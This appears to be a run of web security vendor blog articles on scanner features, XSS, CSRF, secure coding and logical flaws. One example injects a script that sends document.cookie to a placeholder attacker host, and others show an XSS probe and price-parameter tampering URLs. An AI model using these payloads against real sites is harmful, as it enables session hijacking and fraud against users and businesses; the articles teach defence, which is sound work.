• Test complex web applications by pre-seeding crawls using a list of URLs, Acunetix Sniffer Log, Fiddler SAZ files, Burp Suite saved and state files, and HTTP Archive (HAR) files.
• Vulnerabilities across all Targets are displayed in one view.
• Vulnerabilities can be filtered by Target, Business Criticality, Vulnerability, Vulnerability Status and CVSS score.
• Vulnerability can be grouped by Target Business Criticality and Vulnerability Severity.

The enhanced Acunetix Online Dashboard provides all necessary information in one place to help manage and track security vulnerabilities

Easier, more effective Target and Vulnerability management

Business Criticality, a user-defined metric to determine how important a Target is to the business’ function, can now be assigned to Targets. This enables you to easily prioritize vulnerability remediation based on business criticality.

Out-of-the-box Issue Tracker and WAF integration simplifies vulnerability remediation

Acunetix Online now supports one-click issue creation in Atlassian JIRA, GitHub and Microsoft Team Foundation Server (TFS), allowing development teams to better keep track of vulnerabilities in their issue tracking systems -- All without leaving the Acunetix Online interface!

Vulnerabilities can now be exported to WAFs (F5 Big-IP ASM, Fortinet FortiWeb and Imperva SecureSphere), allowing users to implement virtual patches to critical vulnerabilities in the WAF, until a fix addressing the vulnerability is deployed to the web application. Scan results can now also be exported to the Acunetix generic XML for integration with other WAFs or 3^rd party systems.

Mark Vulnerabilities As Fixed Or False Positives

Acunetix Online not provides the ability to mark vulnerabilities as False Positive, Fixed or Ignored. This means that users can now get rid of false positives from upcoming scans and reports.

To make vulnerability management more useful, Acunetix Online will now label reoccurring vulnerabilities as Rediscovered. You may choose to accept a vulnerability’s risk by marking the vulnerability as Ignored.

Custom Scan Types

Scan Types are a logical grouping of tests that test for specific classes of vulnerabilities. Of course, Acunetix Online comes bundled with commonly used default Scan Types, however, Acunetix Online now even create your own Scan Types. A great example of a Custom Scan Type is to scan Targets for a recently discovered vulnerability.

Enhanced Reporting

In addition to generating reports for an individual scan, Acunetix Online now allows you to generate reports on:

• Individual or multiple Scans
• Individual or multiple Targets
• Individual, multiple or all the Vulnerabilities identified by Acunetix.

There is also the introduction of a Scan Comparison report which highlights the differences between 2 scans, allowing the user to easily identify the new vulnerabilities in the latest scans, or the vulnerabilities that have not been detected, which could mean that they are fixed. Reports are now available in both PDF and HTML.

Network Security Scanning

Acunetix Online provides a comprehensive perimeter network security scanning service by integrating with the latest OpenVAS network vulnerability scanning engine (v9). This means that Acunetix Online can now detect in excess of 50,000 perimeter network vulnerabilities.

Added Functionality For Acunetix Integrators

Acunetix Online now also has a new powerful RESTful API that may be used by system integrators. The API is able to provide up-to-the-minute status of on-going scans together with information on vulnerabilities identified for these scans.

This article aims to help you understand how Cross Site Scripting (XSS) attacks work. Cross Site Scripting or XSS can happen in many ways. For example, an attacker may present you with a malicious website looking like its original and ask you to fill in your credentials. When your browser sends its cookies over to the malicious website, the attacker decodes your information and uses it to impersonate you at the original site. This is a targeted attack and is called non-persistent in technical terms.

Websites and web applications usually send a cookie to identify a user after he/she has logged in. For every action from the user on the site, the user's browser has to resend the cookie to the web application as identification. If an attacker is able to inject a Cross-site Scripting (XSS) payload on the web application, the malicious script could steal the user's cookie and send it to the attacker. The attacker can then use the cookie to impersonate the user in the web application. The most dangerous variation of XSS is persistent, or stored XSS. This is because the attacker’s XSS payload gets stored and served to each visitor accessing the website or web application without any user interaction.

By stealing a session cookie, an attacker can get full control over the user's web application session.

What Happens During An XSS Attack?

Although Cross-site Scripting (XSS) is one of the most common forms of attacks, most people underestimate its power to exploit. In an XSS attack, the attacker targets the scripts executed on the client-side rather than on the server-side. Mostly it is the internet security vulnerabilities of the client-side, because of JavaScript and HTML, which are the major victims for these kinds of exploits.

In an XSS attack, the attacker manipulates the client-side scripts of the web application of the user to execute in a certain manner suitable to the attacker. With such a manipulation, the attacker can embed a script within a page such that it executes each time the page is loaded or whenever a certain associated event is performed.

Basic XSS attack. How malicious scripts are injected into web servers & victims browsers

In another variation of the XSS attack, the attacker has infected a legitimate web page with a malicious client-side script. When the user opens the web page in his browser, the script downloads and, from then on, executes whenever the user opens that specific page.

As an example of an XSS attack, a malicious user injects their script into a legitimate shopping site URL. This URL redirects a genuine user to an identical but fake site. The page on the fake site runs a script to capture the cookie of the genuine user who has landed on the page. Using the cookie the malicious user now hijacks the genuine user's session.

Most site owners do not view XSS attacks as serious enough to steal sensitive data from back-end databases, however, the consequences of an XSS attack against a web application can be quite serious and both application functionality and business operation may be seriously compromised.

If an enterprise's site is vulnerable to XSS exploits, present and future customers may not want to continue to do business with it fearing leakage of sensitive information. The loss of trust will definitely not auger well for the future of the enterprise. It might also lead to a defaced application and a public embarrassment for the enterprise, much to the relish of the attacker.

Exploitation through XSS may lead to the following:

• Theft of identity;
• Accessing of restricted or sensitive information;
• Free access to otherwise paid-for content;
• Spying on the habits of the user;
• Changing the functionality of the browser;
• Public defamation of an enterprise or an individual;
• Defacement of a web application;
• Denial of Service to genuine users.

In several cases of XSS attacks, malicious attackers have made use of security flaws in high-profile web sites and obtained user information and credit card details to carry out expensive transactions. They have tricked legitimate users into visiting a malicious but legitimate looking page that captured the user’s credentials and sent the details to the attacker.

Although the above incidents may not be as bad as that of attackers gaining access to an enterprise database, customers can easily lose faith in the application's security. For the owner of the vulnerable website, such incidents can turn into legal hassles, liabilities, and loss of business.

Protecting Your Cookies From XSS Vulnerabilities

There is not much one can do for a targeted attack or a non-persistent attack where the user has delivered his/her credentials to the attacker. However, web application scan use automated tools to check whether they are vulnerable to Cross-site Scripting.

The complex nature of web applications in present use makes it difficult to identify and check all attack surfaces manually against XSS attack variants, because the variants can take multiple forms. Therefore, automated web application security scanners are preferable as they can crawl the website automatically and check for any vulnerability to cross-site scripting. They detect and indicate the existing vulnerability of the URL and input parameters on the script of the website, which the owner of the website must then fix.

What is a Cookie?

When visiting a website, a cookie (small file) from the website is usually stored on your computer containing information such as login details, items you had in your shopping basket etc. Each cookie is unique to your web browser and website visited, so that the website can retrieve or read the contents of its cookie when revisiting it. What most people are unaware of is that any malicious attacker with access to your computer can use the cookies stored therein to exploit access to websites you have visited earlier.

A malicious attacker may take advantage of this situation by latching on to the authentication cookie the user is sending to the website for initiating an action and then using the credentials to impersonate the user. The attacker uses Cross Site Request Forgery (CSRF) for initiating the attack.

Mechanism of a CSRF Attack

The Open Web Application Security Project (OWASP) Top 10 lists Cross Site Request Forgery which is an attack whereby an attacker uses his or her website to send malicious code to a vulnerable web application in which a user is already authenticated.

Figure 1. Illustration of how CSRF attacks work

When the user visits the attacker’s website, the malicious code inadvertently forces the user’s browser to generate an unwanted request to the intended web application, thereby also making it send an authentication cookie. That allows the attacker to gain access to the functionality of the target web application just as the user would. Targets include web interface for network devices, in-browser email clients, and web applications such as social media sites.

Examples of CSRF attacks include the attacker transferring unauthorized money from victims’ bank accounts, sending out offensive postings on social media sites by impersonating you, and snooping on all your Internet traffic by redirecting your router (analyzed below). The attacker does all this from a site different from the vulnerable site, hence the name Cross Site.

Executing A CSRF Attack

Assume you have recently purchased a home wireless router and are trying to configure it via its web interface. As with the most routers, it has a commonly used internal IP address of 192.168.1.1. Since it is difficult to configure, you seek help from a website that has published a guide that shows the necessary buttons to click on the router interface to get everything set up securely.

The website guide actually belongs to attackers and they have a CSRF attack set up in the tutorial. They know that when clicking through their guide, you are also logged in to your router, following their instructions. The CSRF attack reconfigures your router without your knowledge so that all internet traffic would be routed to a proxy server they have set up on the internet, allowing them to monitor your internet activity.

Preventing CSRF Vulnerabilities

To prevent CSRF vulnerabilities, it must be clear the vulnerability actually lies in the affected web application and not in the victim’s browser or the site hosting the CSRF. Therefore, web applications need countermeasures to raise the bar for making CSRF more difficult to perform.

1. As CSRF relies on HTTP requests that produce side effects such as deletions or data modifications with the use of HTTP POST. However a HTTP POST alone may not suffice, as even after the page is loaded, an attacker can create a phantom POST request by using JavaScript. Additional safeguards are necessary to avoid CSRF for POST requests:
2. Check the HTTP Referrer header to verify that the request originated from the web browser the user is using and not from a malicious user agent. Of course, it is also possible for someone to inject HTML/JavaScript code into your page to originate the request. An alternative is to add an original header to the HTTP packet and send it only after the POST request with only a hostname, to ensure privacy.
3. Use one-time tokens. This is a popular method used by banks. The token is generated from a small electronic device for a single session of the user and included in each transmission. Forms contain a field that is populated by the token similar to the one shown below:

   

   Figure 2. Security tokens used for e-banking

4. Use a double-submitted cookie. This is an advanced variation of the one-time token, where the token coming with the form is matched with a cookie, instead of the session value.
5. Use a web application security scanner: you can also use an automated web application security scanner to automatically detect CSRF vulnerabilities in web applications. If you use Netsparker Desktop you do not need to disable the one-time token anti-CSRF technology to automatically scan your website.

Although the above suggestions will reduce the risk dramatically, they are no match for advanced CSRF attacks. Using unique tokens and eliminating all XSS vulnerabilities in web applications are still the strongest techniques against such CSRF attacks.

At the same time, it is important to realize that security is a very broad term. Many people mistakenly associate network security with web application security. While there are some similarities, there are also many distinct differences that necessitate a unique approach to each. The assumption that a secure network results in a secure web application and vice versa is a critical mistake.

In this article, we are going to look at what makes web application security different from network security and why an approach that addresses both is the only way forward when it comes to maintaining an effective overall IT security posture.

What Is Network Security?

Network security can be either hardware based (routers with a built-in firewalls, network intrusion and detection systems) or software based. Because network security has been around for a very long time, it’s often the first thing that comes to mind when people think about security. Web application security on the other hand, is a relatively new challenge.

Much like a moat, curtain wall and portcullis protect a castle, network security plays the important but restrictive and limited role of keeping the bad guys (hackers) out and allowing the “good guys” to enter. In the DMZ environment there’s an overall focus on protecting the perimeter that surrounds the website, web application or web service with the help of a Firewall security appliance. Although this works well in some instances, Firewall security appliances are no longer considered an adequate solution because they are unable to protect organizations from their own vulnerable web services or web application servers.

Even in the event of an Intrusion Prevention System (IPS), new application-based exploits or incorrectly secured web applications are almost impossible to detect as IPS systems are signature-based which means they need to know about a specific exploit or attack in order to help protect against it.

Let’s examine two very common scenarios based in the organization’s DMZ environment which is where most internet originating attacks focus on:

First, when is network security considered effective? As an example, an FTP server might have a network security setting that limit access to it for a specific remote user. This effectively controls who is able to access the server, however we must keep in mind that the FTP server is responsible of filtering all requests from non-allowed users.

Second, if you have a high-traffic website or web application open to the public, ports 80 (HTTP) or/and port 443 (HTTPs) are usually required to be open,allowing valid and malicious traffic access the resource. The only way to effectively address this issue is through web application security to eliminate all potential web application vulnerabilities. Our article covering popular websites that have been repeatedly comprimised is direct proof of such real-life examples.

Web Application Security

Consumers’ need for applications that provide more information and increased functionality has organizations creating increasingly complicated web applications. As a result, the attack surface of many web application is rarely static. It’s either increasing in size or becoming more complicated. The process of managing web application security is a challenging one that is continuously becoming more time-consuming and demanding as applications continue to become more complex.

There are two distinct aspects that make web application security such a challenge:

1. The organization’s network infrastructure provides access to the web application, by default, it exposes all potential vulnerabilities to attack including web forms, input fields, logical web vulnerabilities and more. The only realistic solution is to work towards the elimination of all vulnerabilities.
2. The second problem is that from a network perspective it is very difficult to differentiate hackers from legitimate traffic, even with the help of a sophisticated firewall security appliance

The problem is further complicated by the fact that many malicious activities including the exploitation of vulnerabilities such as SQL Injection and DOM based Cross-Site Scripting vulnerabilities present themselves as regular traffic passing through port 80 or 443. Therefore the only way to resolve this problem is to place a greater emphasis on eliminating all web application vulnerabilities.

Summary

Every organization will have an individualized approach to security. The ideal approach takes into account both networks and web applications. Historically, a greater emphasis has been placed on network security, and this is an approach that has worked well.

However, as the trend towards depending more on increasingly complicated web applications and improved access to information continues, it has become critically important to manage all aspects of security — reducing overall risk to the greatest extent possible.

Obviously, this involves monitoring and controlling network traffic but it also includes the adoption of secure coding practices, scanning web applications for all potential vulnerabilities and using manual penetration testers who are experienced enough to identify and test for logical vulnerabilities.

This great feature of automatically generating ModSecurity rules for identified vulnerabilities through a web vulerability scanner, giving all users the ability to now create and deploy ModSecurity rules immediately – saving valuable time and accelerating the whole scan-&-patching process considerably. Figure 1. Generating ModSecurity Rules from a Web Application Vulnerability Scanner

ModSecurity is used by many vendors and webservice providers as it is capable of delivering a number of security services including:

• Full HTTP traffic logging. ModSecurity gives you the ability to log anything you need, including raw transaction data, which is essential for forensics analysis and in-depth tracing.
• Web Application Hardening. Helps fix cross-site request forgery vulnerabilities and enforce security policies with other Apache modules.
• Real-time application security monitoring. ModSecurity provides full access to the HTTP traffic stream along with the ability to inspect and action against attacks.
• Becomes a powerful exploit prevention tool when paired with web server and web application vulnerability scanners such as Netsparker.

Most Web Application Vulnerability Scanner vendors provide full details on how to use their web application scanner to successfully generate ModSecurity rules that will help identify and block existing vulnerabilities in web applications and web servers.

However, there are significant differences between technical and logical vulnerabilities which are critically important — especially if you are developing or penetration testing a web application.

Automated web application security scanners are indispensable when it comes to scanning for potential vulnerabilities. Web applications today have become complicated the point where trying to eliminate all vulnerabilities manually is nothing short of foolish. The task is too large to even attempt. And, even if you did, you are likely to miss far too many as a result of human error.

Don’t let that lead you to believe that humans have no place in the process. While computers are indispensable in their ability to tirelessly scan for technical vulnerabilities, humans have the unique ability to not only think logically, but also analytically.

As a result, we still play a critical role in the process of identifying vulnerabilities in websites and web applications and will likely do so for some time to come.

But what is the difference between logical and technical vulnerabilities? And where should humans intervene in the detection process? To understand this, let’s take a closer look at the difference between the two.

Technical Vulnerabilities

Technical vulnerabilities is an area where automated scanners excel — it is a rule-based process. It is also time intensive, because of the vast number of attack vectors and potential vulnerabilities. For a human to complete this process, while possible, would be extremely expensive and likely full of both false-positives and false-negatives.

A common example of a technical vulnerability (for example SQL Injection) would be an application that requires information to be submitted by a user through a form. Any data submitted needs to be properly sanitized and failure to do so could make your application vulnerable to attack.

Testing for this is a simple task. For example, a hacker could probe for a vulnerability by submitting an email address with a single quotation at the end of the text. The response they receive might indicate the presence of a vulnerability.

Now, imagine your web application has 300 potential inputs. Without automation, the process would be time-consuming for both the hacker and the penetration tester. Luckily, the test and the potential result are predictable and repeatable. This makes testing for vulnerabilities like this relatively easy for an automated scanner. Speed and consistency are important in the testing process because it only takes one vulnerability to cause a problem.

Logical Vulnerabilities

Logical vulnerabilities are much harder to detect primarily because they require a human to think about and assess a potential problem. While it’s true that some logical vulnerabilities can be programmed, it’s often cost-prohibitive to do so.

The ability to detect logical vulnerabilities can also be highly dependent upon experience. For example, consider a burglar trying to break into your house.

If the burglar only operated from a technical perspective, they might try to open each door and window in your house and come to the conclusion that it’s either locked or unlocked. If it’s locked, they would move on and try the next one. If it’s unlocked they would realize that a vulnerability is present.

On the other hand, if the burglar operated from a logical perspective and was experienced, they might look at your window and realize that it’s 25 years old. As a result of experience, they might realize that your locking mechanism could be worn out. By simply tilting the window in the right fashion, the lock might pop out of place and the window would open.

This is the kind of logical vulnerability that requires a human to expose it. Now, let's imagine you’re running an eCommerce store. You offer a 40% bulk discount for anyone who purchases 10 or more of a single item. Your web application creates a URL that looks like this when someone places a qualifying order:

/checkout/cart/couponPost?product=712&qty=10&coupon_discount=40

Now, imagine if someone came along and decided that they wanted the same 40% discount even if they only bought one item. They might try to use the following URL:

/checkout/cart/couponPost?product=712&qty=1&coupon_discount=40

Would the above URL enable them to bypass your quantity requirement? What about this one:

/checkout/cart/couponPost?product=712&qty=1&coupon_discount=90

Would this URL allow them to purchase a single item with a 90% discount?

These are just some basic examples of logical vulnerabilities that require input from a human. They also demonstrate the importance of using a security professional who is familiar with your industry and your application. That means hiring someone who has the right kind of experience and who can ask the right questions.

The good news about logical vulnerabilities is that, as a general rule, they are more difficult to find. Not only does a hacker require more skill to find them, but they also can’t use automated tools as easily.

The best real-world description of a logical vulnerability is when an attacker causes your web application to execute or to do something that was not intended to happen — as in the example above where someone was able to generate a discount that they should not have been entitled to.

The Importance Of Assessing Technical & Logical Vulnerabilities

In order to properly assess a web application for vulnerabilities, it is critical to consider both technical and logical. Automated tools are invaluable when it comes to efficiency and reliability. They are thorough, tireless and, when setup properly, very reliable.

But that does not mean human input can be removed from the process. When it comes to assessing a situation from a logical and analytical perspective and considering potential outcomes, the human mind wins the battle every time.

Hopefully, this post makes clear the importance of using both automated tools and live penetration testers. Neither is 100% reliable but, when used in conjunction with one another, they provide a solution that is both cost-effective and reliable. Read more about web application vulnerabilities and testing methods by visiting our Web Application security scanner section.

Out of the 269 vulnerabilities a specific scanner detected the web vulnerability scanners identified:

• 180 were Cross-site Scripting vulnerabilities. These include reflected, stored, DOM Based XSS and XSS via RFI.
• 55 were SQL Injection vulnerabilities. These also include the Boolean and Blind (Time Based) SQL Injections.
• 16 were File Inclusion vulnerabilities, including both remote and local file inclusions.

The rest of the vulnerability types are CSRF, Remote Command Execution, Command Injection, Open Redirection, HTTP Header Injection (web server software issue) and Frame injection.

In this article, we’re going to talk about automating your web security in the safest and most effective way. We’ll also touch on a few Web Application Security automation tools worth considering using. Furthermore, we'll speak about why its important to select the right Web Application Scanning tool and how it can help meet your web development time frame, saving the company a lot of money and time.

Automation has been a popular buzzword in the digital space for a few years now. With the ability to reduce labour hours, eliminate repetitive tasks and improve the bottom line, it seems that everyone is looking for a way to automate their daily workflow to every extent possible. With web application security testing being both time-consuming and expensive, it’s a prime candidate for automation.

In the never-ending game of cat and mouse between developers, penetration testers and hackers The speed of execution plays a significant role in the identification and management of vulnerabilities. What makes the process even more challenging is the fact that both security professional and hackers are using the same or similar tools.

If you’re not taking advantage of the ability to automate some of your security scanning, it’s only a matter of time until someone beats you to the punch. In almost all situations, it’s not a risk worth taking.

Despite all the positive aspects that arrive as a result of using an automated web security scanner, there are still some important points to consider during the implementation process in order to maximize your effectiveness.

Automation Starts With Planning

As with any undertaking, in order to achieve optimal results, it’s imperative that you follow a well thought out planning process. This means before you commence automated web vulnerability scanning, you should develop a plan that is specific, measurable, attainable and time-sensitive.

Reducing risk and searching for web application vulnerabilities requires nothing short of a detailed plan. You need to understand what a potential hacker might be looking for and where the most serious risks might lie, area that will vary with every business. You also need a clear understanding of what tools you’ll be using as well as how they will be used.

Automating web security means having a plan that is measurable. This is best achieved through accurate reporting and open communication amongst your team. If a web application is in development, you should be testing at specific predetermined intervals throughout the development lifecycle. Writing vulnerable code on top of vulnerable code merely exacerbates the problem.

A plan that’s attainable will help to keep you on track. Consistent and methodical testing is always better than inconsistent and haphazard.

Finally, having a time-sensitive completion date is always vital to the overall success. If your project never leaves the development and testing phase, is still a liability from a business perspective, which is why many developers turn to automatic scanning tools from both the open-source and commercial sector

Automated Versus Manual Scanning

You might be asking, “how can an automated web vulnerability scanner possibly replace a human?” You’d be correct in your assumption that an automated scanner is no replacement for human intuition or experience. However, you’d probably also agree that manually scanning for hundreds or thousands of cross-site scripting (XSS) vulnerabilities across multiple web applications can quickly become an unrealistic proposition.

One of the keys to automating your web security is finding the appropriate timing and balance between using an automated scanner and a security professional. Intuition and experience are razor sharp at 7 AM, but their effectiveness and reliability have decreased significantly by 4 PM.

Use a human element where necessary and automate everywhere else. We discussed this recently when comparing technical and logical vulnerabilities, and it’s clear that while many of the vulnerabilities listed in the OWASP top 10 require human logic, there are many that do not – efficient allocation of human resources has financial benefits and can also improve the effectiveness of logical analysis.

Choose Your Tools

Once you’ve outlined a plan, it’s time to select your tools. There are a variety of tools available for your consideration and evaluating web application security scanners is not an easy job. Use any tool you are comfortable with. It’s also important to note that experienced penetration testers have learned that it’s best not to rely on one single tool.

Deciding on an automated security scanner often raises the debate between free and open source versus paid commercial platforms. There is no right or wrong answer.

An example of an open source platform for someone who is developing their own application would be a tool such as the OWASP Zed Attack Proxy. It’s relatively easy to use and provides both active and passive scanning, a spider, full reporting and a brute force component that can help to find files with no internal links.

On the other hand, you might also want to consider a commercial web application security scanner. More often than not, they offer a superior user-interface, more consistent updates, as well as better support. On balance, a commercial scanner is often more user-friendly and functional with frequent updates as the developer has a vested interest in offering a high-quality product.

Although open source tools like OWASP ZAP offer a multitude of functionality, best practices dictate that you also use tools dedicated to a specific task. For example, DirBuster and Wfuzz are two tools designed specifically for bruteforcing web applications.

By using a variety of tools, some of which overlap in functionality, you’re more likely to identify and expose a greater number of vulnerabilities.

Implement & Iterate

There is no magic recipe of secret sauce when it comes to automating your web application security scanning. It’s a process that relies heavily on a combination of smart planning, the right tools and necessary experience.

It’s also important to remember that automation is about more than saving time and money. It’s about strategically implementing a process designed to efficiently reduce the vulnerability of your web applications –  letting both software and humans do what they do best.

Our article covering major security breaches in well—known companies, clearly demonstrates that there are many gaps in web security, which are causing multi-million dollar damages to companies world-wide. In this article we analyze the best security practices and principals to help increase your web application security.

While security experts are adamant that there is still much to improve in most web applications’ security, the gaping security holes that attackers are exploiting, are still present, as can be confirmed by some of the latest string of attacks on Yahoo and several departments of the government of the United States.

These attacks, as one can imagine, are the cause of financial loss as well as loss of client trust. If you held an account with a company that suffered a data breach, you would think twice before trusting that company with your data again. Recently, developers have been brought into the fold with regards to web application security; a field that a couple of years ago was only relevant to security professionals whose jobs revolve around security. Nowadays, security has become a requirement that has to be implemented, for a web application developer to meet all the necessary deliverables. Security needs to become a part of the development process, where it is implemented in the code that is being written, and not just as an afterthought that becomes relevant after an attack.

Security has to be a part of every step of the software development life cycle due to its importance. A chain is only as strong as its weakest link, as is a web application - a low level vulnerability can provide an attacker with enough of a foothold that will allow the attacker to escalate the exploit to a higher level. Below are some principles that every web application developer should follow throughout the SDLC, to ensure that they are writing code that is secure enough to withstand any potential attack.

The Defense in Depth Approach

Defense in depth is a concept whereby a system that needs to be secured, will sit behind multiple layers of security. Here, redundancy is key, so that if a security mechanism fails, there will be others that will catch the vulnerability or block its exploitation. It is important that these layers of security are independent from each other and that if one is compromised, the others will not be affected. It would appear that integrating the mechanisms with each other can make for a better security system, such as if one security mechanism detects a vulnerability, it will alert the others so that they can be on the lookout for anything that the first mechanism might have missed. This is not the case, as it will only make for a weaker defense. If the first layer is compromised, it could lead to the other layers being compromised as well, due to their integration which leads us to the fact that having separate and independent mechanisms is the best implementation to go with.

One such example of implementing a defense in depth approach would be to restrict an administrator panel to be accessed only from a particular IP address. Even though there is enough protection, for most cases, by using credentials in the form of a username and password to log into the admin panel, the added layer of protection will come in handy. If the password is disclosed to an attacker, the protection will no longer be valid, therefore making the login setup irrelevant. By implementing another small but robust security feature, you will be moving towards making your defense infallible.

On the other hand, a security feature should not be a complete inconvenience to the user. For example, allowing access to an admin panel from one IP address makes sense, but requiring the user to pass through too many security checks, will lead the user to take certain shortcuts that will render all the security features that have been set up, futile.

For example, if you request a user to change their password every day, you can be sure that these passwords will be written down on a piece of paper, thus making the environment less secure than what it was to begin with. Which is why there needs to be a balance of making sure that a system is secured, while still allowing users to utilise the system.

Filtering User Input

The key principle is not to trust the end user, since one can never know for sure if the user’s intent is malicious or if the user is simply using your website for its intended purpose. Filtering user input is a good method that will allow your web application to accept untrusted inputs while still being safe to use and store that input.

There are many ways to filter input, depending on the vulnerabilities that are being filtered against. The problem that comes with not filtering user input does not end at the web application itself, since this input will be used subsequently. If the malicious input is not filtered, certain vulnerabilities such as SQL Injection, Cross Site Request Forgery and Cross-site Scripting can be exploited.

Cross-site Scripting (XXS) works since the browser or web application, depending on the type of XSS, will execute any code that it is fed through user input. For example, if a user enters:

<script>alert(‘Exploited Vulnerability’)</script>

And this input is not sanitised, this snippet will be executed. To ensure that this input will not be executed, the data needs to be sanitised by the server.

Filtering user input should always be done on the server side, because once again, the user can never be trusted. If Javascript is used on the client side, there are ways to bypass these checks, but implementing the check on the server ensures that no malicious input will get past the filter.

Principle Of Least Privilege

This principle applies to both applications and users, where the amount of privileges that are provided need to be equivalent to the privileges that are required for them to fulfill their purpose. For example, you would not provide a user who uses their machine for word processing with the authority to install software on that machine.

The same goes for applications - you would not allow an application that provides you with weather updates, with the authority to use your webcam. Apart from the obvious issue where the user (and application) cannot be inherently trusted as they can have malicious intent, the user can also be fooled into performing actions using the allowed authority. For example, the best way to prevent a user from unintentionally installing malware, would be to not allow the user to install anything in the first place.

If a web application will be handing SQL queries and returning the results, the database process should not be running as administrator or superuser, since it brings with it unnecessary risks. If the user input is not being validated and an attacker is able to execute a query of their own, with enough time and the appropriate privileges, the attacker can perform any action that they wish, since they would be running as admin or superuser on the machine hosting the database.

Whitelist, Not Blacklist

This choice will generally depend on what is actually being protected or what access is allowed. If you want the majority of users to access a resource, you will use a blacklist approach, while if you want to allow certain users, a whitelist approach is the way to go. That being said, there is the easier way and the safer way. Whitelisting is considered safer due to the ambiguity of blacklists.

In a blacklist, everything is allowed except those that are not, while in a whitelist, anything that is not listed is not allowed by default. This makes whitelisting more robust when it comes to controlling user input, for example. It is safer to explicitly allow a set of characters that can be inputted by a user, so that any special characters that can be used for an attack, are excluded automatically. By default blacklisting will allow anything, so if the list of exclusions does not include every possible attack parameter and its different variations, there is still a chance of a malicious user input being accepted and passing through the filter.

The amount of variation and obfuscation techniques that have become widespread make the whitelisting approach more desirable. Blocking <script> from user input will not be enough since more advanced techniques are being implemented that are being used to bypass filters that normally search for <script> tags.

For example, if you have a registration form, where a user is prompted to enter their designation, it is much safer to allow all the possible designations (Mr, Mrs, Ms, Dr, Prof., etc.) than having to block all the possible attack parameters that an attacker could use instead of actually inputting their designation.

Finally, the most important principle of all, is that from all the precautions and security measures that are taken, they are still not enough. This is due to two factors, the first being that thinking highly of your web application’s security will leave you complacent and with a false sense of security, where you are sure that your web application is secure from any potential threat. This can never be the case since every day, new advanced threats emerge that could bypass all the security that has been implemented. This leads us to the second point, where successful security techniques are ever evolving even on a daily basis. It is the developer’s responsibility to remain updated with emerging security techniques and threats, since there is always room for improvement when it comes to security.

We left this principle for last; you never know enough. That’s right, we never know enough. Web application security, like any other IT security related subject is evolving on a daily basis. Keep yourself informed by reading and following industry leading web application security blogs.

XSS exploits can be incredibly simple. The simplest attack grabs the user’s cookie contents and sends it to another server. When this happens, the attacker can extrapolate the user’s session information from what he receives, spoof his cookies to appear as if he is the victimized user, and gain unauthorized access to that user’s account. Obviously, if the user is privileged, like a moderator or administrator, this can have serious ramifications.

As an example, think of an error message page where the message itself is part of the website address (known as a Uniform Resource Identifier, or URI), and is directly presented to the user. For this example, say that web page acts as follows:

Request URI: /error.page?message=404 Error – Content Not Found

1. <html><head><title>Error</title></head><body>

2. An error occurred:<br />

3. 404 Error – Content Not Found

      4. </body></html>

In line 3, you can see the idea behind the page: the error message provided via the query string variable message is printed to the user. If this URI does not sanitize anything, namely such as stripping HTML tags out, an attacker can inject anything.

They can also mask that inject a little by substituting values with URL encoded values. If they wanted to steal cookies off a user using this error page, they could do so as follows:

Request URI: /error.page?message= %3Cscript%3Evar+i%3Dnew+Image%28%29%3Bi.src%3D%22http%3A//attacker.site/cookie%3Fvalue%3D%22+document.cookie%3B%3C/script%3E

1. <html><head><title>Error</title></head><body>

2. An error occurred:<br />

3. <script>var i=new Image();i.src="http://attacker.site/cookie?value="+document.cookie;</script>

      4. </body></html>

First, notice the oddity of the message in the URL. Those two-character values prefixed with a percent sign (%) are hexadecimal numbers representing each character: %3C for <, %3D for =, and so forth. This is a mild form of obfuscation, allowing the browser to understand the string while confusing the user reading it.

In line 3, you can see that the browser properly understood the string and evaluated it into some JavaScript. In this particular example, the attacker has a script on his server that captures user cookie data by tricking the browser into loading that page as an image object. That object passes along the user’s cookie contents for the website to the attacker. That attacker now has the victim’s IP address, cookie data, and more, and can use this information to gain unauthorized access to the victimized user’s account, or worse, to more privileged areas of the website if the victimized user account had elevated rights.

Different Kinds Of XSS Vulnerabilities

This is also only one example of the various kinds of XSS attacks that can be executed. XSS attacks fall into three general categories as defined by OWASP: Stored, Persistent XSS, Reflected, and DOM-based XSS. Stored XSS attacks, as their name implies, are stored unsanitized in the website (such as in a database entry) and rendered on page-load (this is how the Samy worm operated). Reflected XSS attacks are usually more common, often a result of data within an unsanitized URI string that is rendered by the website’s frontend code (such as in the example above). The final type, DOM-based, exploits the Document Object Model environment similar to a reflected XSS attack, but by altering the page’s elements dynamically.

Identifying XSS Vulnerabilities In Your Web Applications

There is no real catchall that can prevent all XSS exploits due to the highly dynamic nature of their existence and the complexities of new libraries and frameworks like jQuery and Bootstrap. However, a good place to start is with a web application security scanner, which searches for these kinds of exploits and more automatically, and provides suggestions on how to fix the identified XSS vulnerabilities. Sanitization is critical anywhere data is received by a website (like user input, query strings, POST form data, etc.), and a good security scanner can show you where sanitization is missing.

Part two analyzes XSS attacks, showing how easy it is to create a XSS script, and provides useful information on how to identify XSS vulnerabilities.

Websites operate typically with two sides to them: the backend and frontend. On the backend, there are the familiar layers of systems that generate the elements for the frontend – the web application service, language renderer (e.g. PHP or Python), database, and so forth. These areas are commonly the ones most focused on when it comes to securing a website, and rightfully so. Some of the most damaging hacks in history were a result of successful attacks on the backend systems. But the frontend, where things like HTML, CSS, and most especially JavaScript exist – is equally susceptible to attack, with considerable fallout as well.

Cross-site scripting, which is more commonly known as XSS, focuses the attack against the user of the website more than the website itself. These attacks utilize the user's browser by having their client execute rogue frontend code that has not been validated or sanitized by the website. The attacker leverages the user to complete their attack, with the user often being the intended victim (such as by injecting code to infect their computer). The user loads a trusted website, the rogue script is injected somehow, and when the page is rendered by their browser that rogue script is executed. With more websites performing their actions as browser-rendered code instead of in Flash or with static pages, it is easy to see why XSS can be a significant threat.

Why Is XSS A Threat & How Does It Work?

An XSS attack can actually be quite dangerous for users of a website, and not just because of the possible trust lost from its customers. When a user accesses a website, often much of its content is hidden behind some form of authentication – like how Facebook is practically useless unless you have an account. That authentication not only hides privileged information, but also provides access to the account itself (social media information, ability to make purchases, etc.). Some of the information required for that authentication is stored on the user's computer, namely in the form of cookies. If a user's cookies can be compromised via an injected XSS exploit, their account can be hijacked as well.

